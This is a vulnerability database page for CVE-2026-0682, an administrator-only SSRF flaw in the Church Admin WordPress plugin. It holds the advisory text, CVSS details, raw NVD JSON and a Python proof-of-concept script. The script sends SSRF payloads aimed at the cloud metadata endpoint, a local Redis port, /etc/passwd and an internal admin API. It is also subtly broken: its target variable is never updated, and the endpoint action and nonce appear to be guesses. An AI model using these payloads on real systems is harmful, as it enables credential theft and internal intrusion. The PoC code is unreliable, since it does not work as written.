Security Vulnerability Report
中文
CVE-2026-0682 CVSS 2.2 LOW

CVE-2026-0682

Published: 2026-01-17 04:16:08
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Church Admin plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.0.28 due to insufficient validation of user-supplied URLs in the 'audio_url' parameter. This makes it possible for authenticated attackers, with Administrator-level access, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Details

CVSS Score
2.2
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Church Admin plugin for WordPress <= 5.0.28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0682 SSRF PoC - Church Admin Plugin for WordPress # Requires Administrator privileges import requests import sys from urllib.parse import urlencode TARGET_URL = "http://target-wordpress-site.com" # Authentication cookie with admin privileges required COOKIES = { "wordpress_test_cookie": "WP+Cookie+check", "wordpress_logged_in_user": "admin_session_token" } def test_ssrf(url): """Test if SSRF vulnerability exists""" endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Malicious audio_url to test SSRF data = { "action": "church_admin_save_sermon", "audio_url": url, "nonce": "attacker_obtained_nonce" } try: response = requests.post(endpoint, data=data, cookies=COOKIES, timeout=10) return response.text except Exception as e: return f"Request failed: {str(e)}" def main(): if len(sys.argv) < 2: print("Usage: python cve-2026-0682-poc.py <target_url>") sys.exit(1) TARGET_URL = sys.argv[1] # Test cases for SSRF exploitation test_urls = [ # AWS metadata endpoint "http://169.254.169.254/latest/meta-data/", # Internal service "http://localhost:6379/info", # File access "file:///etc/passwd", # Internal API "http://internal-admin.local/api/config" ] print(f"[*] Testing CVE-2026-0682 SSRF on {TARGET_URL}") for test_url in test_urls: print(f"\n[*] Testing: {test_url}") result = test_ssrf(test_url) print(f"[+] Response: {result[:200]}...") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0682", "sourceIdentifier": "[email protected]", "published": "2026-01-17T04:16:07.987", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Church Admin plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.0.28 due to insufficient validation of user-supplied URLs in the 'audio_url' parameter. This makes it possible for authenticated attackers, with Administrator-level access, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}, {"lang": "es", "value": "El plugin Church Admin para WordPress es vulnerable a la falsificación de petición del lado del servidor en todas las versiones hasta la 5.0.28, inclusive, debido a la validación insuficiente de las URL proporcionadas por el usuario en el parámetro 'audio_url'. Esto permite a atacantes autenticados, con acceso de nivel de Administrador, realizar peticiones web a ubicaciones arbitrarias originadas desde la aplicación web y puede usarse para consultar y modificar información de servicios internos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.2, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.7, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/church-admin/tags/5.0.27/includes/functions.php#L6297", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/church-admin/tags/5.0.27/includes/sermon-podcast.php#L1181", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/church-admin/trunk/includes/functions.php#L6297", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/church-admin/trunk/includes/sermon-podcast.php#L1181", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440847%40church-admin&new=3440847%40church-admin&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/77227fc5-7c38-476d-af4c-4b2ad3dd8420?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.